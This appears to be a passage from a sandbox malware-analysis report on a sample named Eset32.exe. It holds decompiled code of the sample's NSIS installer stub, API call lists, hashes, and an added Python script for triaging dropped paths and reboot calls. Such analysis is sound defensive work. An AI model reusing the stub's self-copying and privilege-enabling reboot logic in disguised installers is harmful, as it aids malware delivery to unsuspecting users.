IsWindowVisible 4122->4123 4131 4051d5 4122->4131 4123->4124 4126 4051cb 4123->4126 4127 405204 CallWindowProcA 4124->4127 4128 4041c7 SendMessageA 4125->4128 4130 404ace 5 API calls 4126->4130 4129 4051b2 4127->4129 4128->4129 4130->4131 4131->4127 4132 404b4e 4 API calls 4131->4132 4132->4124 4133 402516 4134 402c0e 17 API calls 4133->4134 4135 402520 4134->4135 4136 402bce 17 API calls 4135->4136 4137 402529 4136->4137 4138 402533 RegQueryValueExA 4137->4138 4142 4027bf 4137->4142 4139 402559 RegCloseKey 4138->4139 4140 402553 4138->4140 4139->4142 4140->4139 4144 406055 wsprintfA 4140->4144 4144->4139 4145 40239c 4146 4023a4 4145->4146 4147 4023aa 4145->4147 4148 402bce 17 API calls 4146->4148 4149 402bce 17 API calls 4147->4149 4151 4023ba 4147->4151 4148->4147 4149->4151 4150 4023c8 4153 402bce 17 API calls 4150->4153 4151->4150 4152 402bce 17 API calls 4151->4152 4152->4150 4154 4023d1 WritePrivateProfileStringA 4153->4154 4155 40149d 4156 402387 4155->4156 4157 4014ab PostQuitMessage 4155->4157 4157->4156 4158 40159d 4159 402bce 17 API calls 4158->4159 4160 4015a4 SetFileAttributesA 4159->4160 4161 4015b6 4160->4161 4162 40209d 4163 40215d 4162->4163 4164 4020af 4162->4164 4167 401423 24 API calls 4163->4167 4165 402bce 17 API calls 4164->4165 4166 4020b6 4165->4166 4168 402bce 17 API calls 4166->4168 4172 4022e2 4167->4172 4169 4020bf 4168->4169 4170 4020d4 LoadLibraryExA 4169->4170 4171 4020c7 GetModuleHandleA 4169->4171 4170->4163 4173 4020e4 GetProcAddress 4170->4173 4171->4170 4171->4173 4174 402130 4173->4174 4175 4020f3 4173->4175 4176 40521e 24 API calls 4174->4176 4177 402103 4175->4177 4178 401423 24 API calls 4175->4178 4176->4177 4177->4172 4179 402151 FreeLibrary 4177->4179 4178->4177 4179->4172 4180 401a1e 4181 402bce 17 API calls 4180->4181 4182 401a27 ExpandEnvironmentStringsA 4181->4182 4183 401a3b 4182->4183 4185 401a4e 4182->4185 4184 401a40 lstrcmpA 4183->4184 4183->4185 4184->4185 4191 40171f 4192 402bce 17 API calls 4191->4192 4193 

Control-flow Graph (entry function, basic blocks starting at 403348; legend: Executed / Not Executed; rendered graph edge data not reproduced)
                                                          C-Code - Quality: 85%
                                                          			_entry_() {
                                                          				signed int _t42;
                                                          				intOrPtr* _t47;
                                                          				CHAR* _t51;
                                                          				char* _t53;
                                                          				CHAR* _t55;
                                                          				void* _t59;
                                                          				intOrPtr _t61;
                                                          				int _t62;
                                                          				int _t65;
                                                          				signed int _t66;
                                                          				int _t67;
                                                          				signed int _t69;
                                                          				void* _t93;
                                                          				signed int _t109;
                                                          				void* _t112;
                                                          				void* _t117;
                                                          				intOrPtr* _t118;
                                                          				char _t121;
                                                          				signed int _t140;
                                                          				signed int _t141;
                                                          				int _t149;
                                                          				void* _t150;
                                                          				intOrPtr* _t152;
                                                          				CHAR* _t155;
                                                          				CHAR* _t156;
                                                          				void* _t158;
                                                          				char* _t159;
                                                          				void* _t162;
                                                          				void* _t163;
                                                          				intOrPtr _t188;
                                                          
                                                          				 *(_t163 + 0x18) = 0;
                                                          				 *((intOrPtr*)(_t163 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
                                                          				 *(_t163 + 0x20) = 0;
                                                          				 *(_t163 + 0x14) = 0x20;
                                                          				SetErrorMode(0x8001); // executed
                                                          				_t42 = GetVersion() & 0xbfffffff;
                                                          				 *0x42f42c = _t42;
                                                          				if(_t42 != 6) {
                                                          					_t118 = E00406500(0);
                                                          					if(_t118 != 0) {
                                                          						 *_t118(0xc00);
                                                          					}
                                                          				}
                                                          				_t155 = "UXTHEME";
                                                          				do {
                                                          					E00406492(_t155); // executed
                                                          					_t155 =  &(_t155[lstrlenA(_t155) + 1]);
                                                          				} while ( *_t155 != 0);
                                                          				E00406500(0xb);
                                                          				 *0x42f424 = E00406500(9);
                                                          				_t47 = E00406500(7);
                                                          				if(_t47 != 0) {
                                                          					_t47 =  *_t47(0x1e);
                                                          					if(_t47 != 0) {
                                                          						 *0x42f42f =  *0x42f42f | 0x00000040;
                                                          					}
                                                          				}
                                                          				__imp__#17(_t158);
                                                          				__imp__OleInitialize(0); // executed
                                                          				 *0x42f4f8 = _t47;
                                                          				SHGetFileInfoA(0x429850, 0, _t163 + 0x38, 0x160, 0); // executed
                                                          				E004060F7("Name Setup", "NSIS Error");
                                                          				_t51 = GetCommandLineA();
                                                          				_t159 = "\"C:\\Users\\alfons\\Desktop\\Eset32.exe\" ";
                                                          				E004060F7(_t159, _t51);
                                                          				 *0x42f420 = 0x400000;
                                                          				_t53 = _t159;
                                                          				if("\"C:\\Users\\alfons\\Desktop\\Eset32.exe\" " == 0x22) {
                                                          					 *(_t163 + 0x14) = 0x22;
                                                          					_t53 =  &M00435001;
                                                          				}
                                                          				_t55 = CharNextA(E00405ABA(_t53,  *(_t163 + 0x14)));
                                                          				 *(_t163 + 0x1c) = _t55;
                                                          				while(1) {
                                                          					_t121 =  *_t55;
                                                          					_t171 = _t121;
                                                          					if(_t121 == 0) {
                                                          						break;
                                                          					}
                                                          					__eflags = _t121 - 0x20;
                                                          					if(_t121 != 0x20) {
                                                          						L13:
                                                          						__eflags =  *_t55 - 0x22;
                                                          						 *(_t163 + 0x14) = 0x20;
                                                          						if( *_t55 == 0x22) {
                                                          							_t55 =  &(_t55[1]);
                                                          							__eflags = _t55;
                                                          							 *(_t163 + 0x14) = 0x22;
                                                          						}
                                                          						__eflags =  *_t55 - 0x2f;
                                                          						if( *_t55 != 0x2f) {
                                                          							L25:
                                                          							_t55 = E00405ABA(_t55,  *(_t163 + 0x14));
                                                          							__eflags =  *_t55 - 0x22;
                                                          							if(__eflags == 0) {
                                                          								_t55 =  &(_t55[1]);
                                                          								__eflags = _t55;
                                                          							}
                                                          							continue;
                                                          						} else {
                                                          							_t55 =  &(_t55[1]);
                                                          							__eflags =  *_t55 - 0x53;
                                                          							if( *_t55 != 0x53) {
                                                          								L20:
                                                          								__eflags =  *_t55 - ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC");
                                                          								if( *_t55 != ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC")) {
                                                          									L24:
                                                          									__eflags =  *((intOrPtr*)(_t55 - 2)) - ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=");
                                                          									if( *((intOrPtr*)(_t55 - 2)) == ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=")) {
                                                          										 *((char*)(_t55 - 2)) = 0;
                                                          										__eflags =  &(_t55[2]);
                                                          										E004060F7(0x435400,  &(_t55[2]));
                                                          										L30:
                                                          										_t156 = "C:\\Users\\alfons\\AppData\\Local\\Temp\\";
                                                          										GetTempPathA(0x400, _t156);
                                                          										_t59 = E00403317(_t171);
                                                          										_t172 = _t59;
                                                          										if(_t59 != 0) {
                                                          											L33:
                                                          											DeleteFileA("1033"); // executed
                                                          											_t61 = E00402EA1(_t174,  *(_t163 + 0x20)); // executed
                                                          											 *((intOrPtr*)(_t163 + 0x10)) = _t61;
                                                          											if(_t61 != 0) {
                                                          												L43:
                                                          												ExitProcess(); // executed
                                                          												__imp__OleUninitialize(); // executed
                                                          												_t184 =  *((intOrPtr*)(_t163 + 0x10));
                                                          												if( *((intOrPtr*)(_t163 + 0x10)) == 0) {
                                                          													__eflags =  *0x42f4d4;
                                                          													if( *0x42f4d4 == 0) {
                                                          														L67:
                                                          														_t62 =  *0x42f4ec;
                                                          														__eflags = _t62 - 0xffffffff;
                                                          														if(_t62 != 0xffffffff) {
                                                          															 *(_t163 + 0x14) = _t62;
                                                          														}
                                                          														ExitProcess( *(_t163 + 0x14));
                                                          													}
                                                          													_t65 = OpenProcessToken(GetCurrentProcess(), 0x28, _t163 + 0x18);
                                                          													__eflags = _t65;
                                                          													_t149 = 2;
                                                          													if(_t65 != 0) {
                                                          														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t163 + 0x24);
                                                          														 *(_t163 + 0x38) = 1;
                                                          														 *(_t163 + 0x44) = _t149;
                                                          														AdjustTokenPrivileges( *(_t163 + 0x2c), 0, _t163 + 0x28, 0, 0, 0);
                                                          													}
                                                          													_t66 = E00406500(4);
                                                          													__eflags = _t66;
                                                          													if(_t66 == 0) {
                                                          														L65:
                                                          														_t67 = ExitWindowsEx(_t149, 0x80040002);
                                                          														__eflags = _t67;
                                                          														if(_t67 != 0) {
                                                          															goto L67;
                                                          														}
                                                          														goto L66;
                                                          													} else {
                                                          														_t69 =  *_t66(0, 0, 0, 0x25, 0x80040002);
                                                          														__eflags = _t69;
                                                          														if(_t69 == 0) {
                                                          															L66:
                                                          															E0040140B(9);
                                                          															goto L67;
                                                          														}
                                                          														goto L65;
                                                          													}
                                                          												}
                                                          												E00405813( *((intOrPtr*)(_t163 + 0x10)), 0x200010);
                                                          												ExitProcess(2);
                                                          											}
                                                          											if( *0x42f440 == 0) {
                                                          												L42:
                                                          												 *0x42f4ec =  *0x42f4ec | 0xffffffff;
                                                          												 *(_t163 + 0x18) = E0040390A( *0x42f4ec);
                                                          												goto L43;
                                                          											}
                                                          											_t152 = E00405ABA(_t159, 0);
                                                          											if(_t152 < _t159) {
                                                          												L39:
                                                          												_t181 = _t152 - _t159;
                                                          												 *((intOrPtr*)(_t163 + 0x10)) = "Error launching installer";
                                                          												if(_t152 < _t159) {
                                                          													_t150 = E0040577E(_t184);
                                                          													lstrcatA(_t156, "~nsu");
                                                          													if(_t150 != 0) {
                                                          														lstrcatA(_t156, "A");
                                                          													}
                                                          													lstrcatA(_t156, ".tmp");
                                                          													_t161 = "C:\\Users\\alfons\\Desktop";
                                                          													if(lstrcmpiA(_t156, "C:\\Users\\alfons\\Desktop") != 0) {
                                                          														_push(_t156);
                                                          														if(_t150 == 0) {
                                                          															E00405761();
                                                          														} else {
                                                          															E004056E4();
                                                          														}
                                                          														SetCurrentDirectoryA(_t156);
                                                          														_t188 =  *0x435400; // 0x0
                                                          														if(_t188 == 0) {
                                                          															E004060F7(0x435400, _t161);
                                                          														}
                                                          														E004060F7(0x430000,  *(_t163 + 0x1c));
                                                          														_t136 = "A";
                                                          														_t162 = 0x1a;
                                                          														 *0x430400 = "A";
                                                          														do {
                                                          															E0040618A(0, 0x429450, _t156, 0x429450,  *((intOrPtr*)( *0x42f434 + 0x120)));
                                                          															DeleteFileA(0x429450);
                                                          															if( *((intOrPtr*)(_t163 + 0x10)) != 0 && CopyFileA("C:\\Users\\alfons\\Desktop\\Eset32.exe", 0x429450, 1) != 0) {
                                                          																E00405ED6(_t136, 0x429450, 0);
                                                          																E0040618A(0, 0x429450, _t156, 0x429450,  *((intOrPtr*)( *0x42f434 + 0x124)));
                                                          																_t93 = E00405796(0x429450);
                                                          																if(_t93 != 0) {
                                                          																	CloseHandle(_t93);
                                                          																	 *((intOrPtr*)(_t163 + 0x10)) = 0;
                                                          																}
                                                          															}
                                                          															 *0x430400 =  *0x430400 + 1;
                                                          															_t162 = _t162 - 1;
                                                          														} while (_t162 != 0);
                                                          														E00405ED6(_t136, _t156, 0);
                                                          													}
                                                          													goto L43;
                                                          												}
                                                          												 *_t152 = 0;
                                                          												_t153 = _t152 + 4;
                                                          												if(E00405B7D(_t181, _t152 + 4) == 0) {
                                                          													goto L43;
                                                          												}
                                                          												E004060F7(0x435400, _t153);
                                                          												E004060F7("C:\\Users\\alfons\\AppData\\Roaming", _t153);
                                                          												 *((intOrPtr*)(_t163 + 0x10)) = 0;
                                                          												goto L42;
                                                          											}
                                                          											_t109 = (( *0x40a15b << 0x00000008 |  *0x40a15a) << 0x00000008 |  *0x40a159) << 0x00000008 | " _?=";
                                                          											while( *_t152 != _t109) {
                                                          												_t152 = _t152 - 1;
                                                          												if(_t152 >= _t159) {
                                                          													continue;
                                                          												}
                                                          												goto L39;
                                                          											}
                                                          											goto L39;
                                                          										}
                                                          										GetWindowsDirectoryA(_t156, 0x3fb);
                                                          										lstrcatA(_t156, "\\Temp");
                                                          										_t112 = E00403317(_t172);
                                                          										_t173 = _t112;
                                                          										if(_t112 != 0) {
                                                          											goto L33;
                                                          										}
                                                          										GetTempPathA(0x3fc, _t156);
                                                          										lstrcatA(_t156, "Low");
                                                          										SetEnvironmentVariableA("TEMP", _t156);
                                                          										SetEnvironmentVariableA("TMP", _t156);
                                                          										_t117 = E00403317(_t173);
                                                          										_t174 = _t117;
                                                          										if(_t117 == 0) {
                                                          											goto L43;
                                                          										}
                                                          										goto L33;
                                                          									}
                                                          									goto L25;
                                                          								}
                                                          								_t140 = _t55[4];
                                                          								__eflags = _t140 - 0x20;
                                                          								if(_t140 == 0x20) {
                                                          									L23:
                                                          									_t15 = _t163 + 0x20;
                                                          									 *_t15 =  *(_t163 + 0x20) | 0x00000004;
                                                          									__eflags =  *_t15;
                                                          									goto L24;
                                                          								}
                                                          								__eflags = _t140;
                                                          								if(_t140 != 0) {
                                                          									goto L24;
                                                          								}
                                                          								goto L23;
                                                          							}
                                                          							_t141 = _t55[1];
                                                          							__eflags = _t141 - 0x20;
                                                          							if(_t141 == 0x20) {
                                                          								L19:
                                                          								 *0x42f4e0 = 1;
                                                          								goto L20;
                                                          							}
                                                          							__eflags = _t141;
                                                          							if(_t141 != 0) {
                                                          								goto L20;
                                                          							}
                                                          							goto L19;
                                                          						}
                                                          					} else {
                                                          						goto L12;
                                                          					}
                                                          					do {
                                                          						L12:
                                                          						_t55 =  &(_t55[1]);
                                                          						__eflags =  *_t55 - 0x20;
                                                          					} while ( *_t55 == 0x20);
                                                          					goto L13;
                                                          				}
                                                          				goto L30;
                                                          			}
                                                          (Per-statement address column for the decompiled routine above omitted; its instructions span 0x00403358 to 0x0040382A, with 0x00000000 marking statements such as goto labels that have no address.)

                                                          APIs
                                                          • SetErrorMode.KERNELBASE ref: 0040336D
                                                          • GetVersion.KERNEL32 ref: 00403373
                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033A6
                                                          • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 004033E2
                                                          • OleInitialize.OLE32(00000000), ref: 004033E9
                                                          • SHGetFileInfoA.SHELL32(00429850,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 00403405
                                                          • GetCommandLineA.KERNEL32(Name Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 0040341A
                                                          • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Eset32.exe" ,00000020,"C:\Users\user\Desktop\Eset32.exe" ,00000000,?,00000007,00000009,0000000B), ref: 00403456
                                                          • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403553
                                                          • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 00403564
                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403570
                                                          • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403584
                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040358C
                                                          • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040359D
                                                          • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004035A5
                                                          • DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 004035B9
                                                            • Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                            • Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                            • Part of subcall function 0040390A: GetUserDefaultUILanguage.KERNELBASE(00000002,76DDFA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Eset32.exe" ,00000000), ref: 00403924
                                                            • Part of subcall function 0040390A: lstrlenA.KERNEL32(C:\Users\user\AppData\Roaming\1.exe,?,?,?,C:\Users\user\AppData\Roaming\1.exe,00000000,00435400,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,76DDFA90), ref: 004039FA
                                                            • Part of subcall function 0040390A: lstrcmpiA.KERNEL32(?,.exe,C:\Users\user\AppData\Roaming\1.exe,?,?,?,C:\Users\user\AppData\Roaming\1.exe,00000000,00435400,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000), ref: 00403A0D
                                                            • Part of subcall function 0040390A: GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Roaming\1.exe), ref: 00403A18
                                                            • Part of subcall function 0040390A: LoadImageA.USER32 ref: 00403A61
                                                            • Part of subcall function 0040390A: RegisterClassA.USER32 ref: 00403A9E
                                                          • ExitProcess.KERNEL32(?,?,00000007,00000009,0000000B), ref: 00403662
                                                            • Part of subcall function 00403830: CloseHandle.KERNEL32(FFFFFFFF,00403667,?,?,00000007,00000009,0000000B), ref: 0040383B
                                                          • OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 00403667
                                                          • ExitProcess.KERNEL32 ref: 00403688
                                                          • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004037A5
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 004037AC
                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004037C4
                                                          • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004037E3
                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403807
                                                          • ExitProcess.KERNEL32 ref: 0040382A
                                                            • Part of subcall function 00405813: MessageBoxIndirectA.USER32 ref: 0040586E
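The API list above is the part of a card like this one that an analyst actually mines: which privileges the code asks for, which paths it touches, what it does to the environment, and what ExitWindowsEx is called with. The following is an added example, not part of the Joe Sandbox report or of its IDA plugin, that parses these bullet lines into structured call records and pulls those items out. The sample input is a constructed subset of the lines listed above, copied in the report's own layout; the EWX_* and SHTDN_REASON_* constants are the Windows SDK values. One caveat when reading the result: the strings in this card ("NSIS Error", "~nsu", the "Low" temp-directory fallback) mark this routine as the NSIS installer stub's entry function, and its SeShutdownPrivilege plus ExitWindowsEx(EWX_REBOOT, planned/application/installation) sequence is the stub's normal reboot-on-request path, so the item worth triaging here is the dropped path C:\Users\user\AppData\Roaming\1.exe rather than the reboot capability itself.

```python
import re
from dataclasses import dataclass
from typing import Any, Dict, List, Optional

# Constructed sample: a subset of this function card's API lines, kept in the
# report's own "• Api.MODULE(args), ref: ADDR" layout, including one nested
# "Part of subcall function" entry.
SAMPLE_APIS = r"""
• SetErrorMode.KERNELBASE ref: 0040336D
• GetVersion.KERNEL32 ref: 00403373
• #17.COMCTL32(?,00000007,00000009,0000000B), ref: 004033E2
• GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403553
• SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040359D
• SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004035A5
  • Part of subcall function 0040390A: GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Roaming\1.exe), ref: 00403A18
• OpenProcessToken.ADVAPI32(00000000), ref: 004037AC
• LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004037C4
• AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004037E3
• ExitWindowsEx.USER32(00000002,80040002), ref: 00403807
• ExitProcess.KERNEL32 ref: 0040382A
"""

LINE_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[^.(\s]+)\.(?P<mod>[A-Za-z0-9_]+)"   # "#17.COMCTL32" is an export ordinal
    r"(?:\((?P<args>.*)\))?"                        # argument list is optional
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# ExitWindowsEx uFlags bits (winuser.h) and the SHTDN_REASON_* fields seen in
# this report (reason.h); only the observed major/minor codes are named.
EWX_FLAGS = {0x1: "EWX_SHUTDOWN", 0x2: "EWX_REBOOT", 0x4: "EWX_FORCE",
             0x8: "EWX_POWEROFF", 0x10: "EWX_FORCEIFHUNG"}
SHTDN_MAJOR = {0x00040000: "SHTDN_REASON_MAJOR_APPLICATION"}
SHTDN_MINOR = {0x00000002: "SHTDN_REASON_MINOR_INSTALLATION"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str                    # address of the call site
    subcall: Optional[str]      # callee function when the entry is "Part of subcall"


def parse_api_lines(text: str) -> List[ApiCall]:
    """Turn the report's API bullet list into structured call records."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                        # headings, blank lines, other sections
        raw = m.group("args")
        # Arguments are comma separated; quoted paths carry a stray space before
        # the closing quote in the report, hence strip() and then strip('"').
        args = [a.strip().strip('"') for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("mod"), args,
                             m.group("ref").upper(), m.group("sub")))
    return calls


def decode_exit_windows(flags_hex: str, reason_hex: str) -> Dict[str, Any]:
    """Name the uFlags bits and split dwReason into planned/major/minor fields."""
    flags, reason = int(flags_hex, 16), int(reason_hex, 16)
    names = [n for bit, n in EWX_FLAGS.items() if flags & bit] or ["EWX_LOGOFF"]
    return {
        "flags": names,
        "planned": bool(reason & 0x80000000),       # SHTDN_REASON_FLAG_PLANNED
        "major": SHTDN_MAJOR.get(reason & 0x00FF0000, hex(reason & 0x00FF0000)),
        "minor": SHTDN_MINOR.get(reason & 0x0000FFFF, hex(reason & 0x0000FFFF)),
    }


def summarize(calls: List[ApiCall]) -> Dict[str, Any]:
    """Collect the triage-relevant facts: privileges, paths, env changes, reboot."""
    out: Dict[str, Any] = {"privileges": [], "paths": [], "env": [],
                           "shutdown": None, "subcalls": []}
    for c in calls:
        for a in c.args:
            if a.startswith("Se") and a.endswith("Privilege") and a not in out["privileges"]:
                out["privileges"].append(a)
            if re.match(r"^[A-Za-z]:\\", a) and a not in out["paths"]:
                out["paths"].append(a)
        if c.api == "SetEnvironmentVariableA" and len(c.args) >= 2:
            out["env"].append((c.args[0], c.args[1]))
        if c.api == "ExitWindowsEx" and len(c.args) >= 2:
            out["shutdown"] = decode_exit_windows(c.args[0], c.args[1])
        if c.subcall and c.subcall not in out["subcalls"]:
            out["subcalls"].append(c.subcall)
    return out


if __name__ == "__main__":
    for key, value in summarize(parse_api_lines(SAMPLE_APIS)).items():
        print(f"{key:>10}: {value}")
```

Run against the full API list of a card, the `paths` entry is the quickest way to spot files the routine drops or checks (here the Roaming\1.exe path comes from the 0040390A subcall), while `shutdown` turns the raw `00000002,80040002` pair into the named EWX_REBOOT / planned application-installation reason so it can be compared with what a legitimate installer would pass.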
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: Process$Exit$File$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDefaultDeleteDirectoryErrorImageIndirectInfoInitializeLanguageLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeUserValueVersionlstrcmpi
                                                          • String ID: "$"C:\Users\user\Desktop\Eset32.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming$C:\Users\user\Desktop$C:\Users\user\Desktop\Eset32.exe$Error launching installer$Low$NSIS Error$Name Setup$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                          • API String ID: 2959975522-3517791578
                                                          • Opcode ID: 62ed222f1d320cf1e4846f893a456cfa79d0b37c4e8f3d7f84edf936fdc15b3d
                                                          • Instruction ID: 2464a3ec660faf4d6335bd380e0cd13b62da1685a36c15adf6e00eeeb0483762
                                                          • Opcode Fuzzy Hash: 62ed222f1d320cf1e4846f893a456cfa79d0b37c4e8f3d7f84edf936fdc15b3d
                                                          • Instruction Fuzzy Hash: 49C107705047416AD7216F759D89B2F3EACAB4530AF45443FF181BA2E2CB7C8A058B2F
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          (rendered graph omitted; basic blocks 0040390A-00403BCE, legend: Executed / Not Executed)
                                                          C-Code - Quality: 96%
                                                          			E0040390A(void* __eflags) {
                                                          				intOrPtr _v4;
                                                          				intOrPtr _v8;
                                                          				int _v12;
                                                          				void _v16;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				intOrPtr* _t17;
                                                          				void* _t25;
                                                          				void* _t27;
                                                          				int _t28;
                                                          				void* _t31;
                                                          				int _t34;
                                                          				int _t35;
                                                          				intOrPtr _t36;
                                                          				int _t39;
                                                          				char _t57;
                                                          				CHAR* _t59;
                                                          				signed char _t63;
                                                          				signed short _t67;
                                                          				CHAR* _t74;
                                                          				intOrPtr _t76;
                                                          				CHAR* _t81;
                                                          
                                                          				_t76 =  *0x42f434;
                                                          				_t17 = E00406500(2);
                                                          				_t84 = _t17;
                                                          				if(_t17 == 0) {
                                                          					_t74 = 0x42a890;
                                                          					"1033" = 0x30;
                                                          					 *0x436001 = 0x78;
                                                          					 *0x436002 = 0;
                                                          					E00405FDE(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a890, 0);
                                                          					__eflags =  *0x42a890;
                                                          					if(__eflags == 0) {
                                                          						E00405FDE(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040836A, 0x42a890, 0);
                                                          					}
                                                          					lstrcatA("1033", _t74);
                                                          				} else {
                                                          					_t67 =  *_t17(); // executed
                                                          					E00406055("1033", _t67 & 0x0000ffff);
                                                          				}
                                                          				E00403BCF(_t71, _t84);
                                                          				 *0x42f4c0 =  *0x42f43c & 0x00000020;
                                                          				 *0x42f4dc = 0x10000;
                                                          				if(E00405B7D(_t84, 0x435400) != 0) {
                                                          					L16:
                                                          					if(E00405B7D(_t92, 0x435400) == 0) {
                                                          						E0040618A(0, _t74, _t76, 0x435400,  *((intOrPtr*)(_t76 + 0x118)));
                                                          					}
                                                          					_t25 = LoadImageA( *0x42f420, 0x67, 1, 0, 0, 0x8040); // executed
                                                          					 *0x42ec08 = _t25;
                                                          					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
                                                          						L21:
                                                          						if(E0040140B(0) == 0) {
                                                          							_t27 = E00403BCF(_t71, __eflags);
                                                          							__eflags =  *0x42f4e0;
                                                          							if( *0x42f4e0 != 0) {
                                                          								_t28 = E004052F0(_t27, 0);
                                                          								__eflags = _t28;
                                                          								if(_t28 == 0) {
                                                          									E0040140B(1);
                                                          									goto L33;
                                                          								}
                                                          								__eflags =  *0x42ebec; // 0x0
                                                          								if(__eflags == 0) {
                                                          									E0040140B(2);
                                                          								}
                                                          								goto L22;
                                                          							}
                                                          							ShowWindow( *0x42a870, 5);
                                                          							_t34 = E00406492("RichEd20");
                                                          							__eflags = _t34;
                                                          							if(_t34 == 0) {
                                                          								E00406492("RichEd32");
                                                          							}
                                                          							_t81 = "RichEdit20A";
                                                          							_t35 = GetClassInfoA(0, _t81, 0x42ebc0);
                                                          							__eflags = _t35;
                                                          							if(_t35 == 0) {
                                                          								GetClassInfoA(0, "RichEdit", 0x42ebc0);
                                                          								 *0x42ebe4 = _t81;
                                                          								RegisterClassA(0x42ebc0);
                                                          							}
                                                          							_t36 =  *0x42ec00; // 0x0
                                                          							_t39 = DialogBoxParamA( *0x42f420, _t36 + 0x00000069 & 0x0000ffff, 0, E00403CA7, 0);
                                                          							E0040385A(E0040140B(5), 1);
                                                          							return _t39;
                                                          						}
                                                          						L22:
                                                          						_t31 = 2;
                                                          						return _t31;
                                                          					} else {
                                                          						_t71 =  *0x42f420;
                                                          						 *0x42ebc4 = E00401000;
                                                          						 *0x42ebd0 =  *0x42f420;
                                                          						 *0x42ebd4 = _t25;
                                                          						 *0x42ebe4 = 0x40a1f4;
                                                          						if(RegisterClassA(0x42ebc0) == 0) {
                                                          							L33:
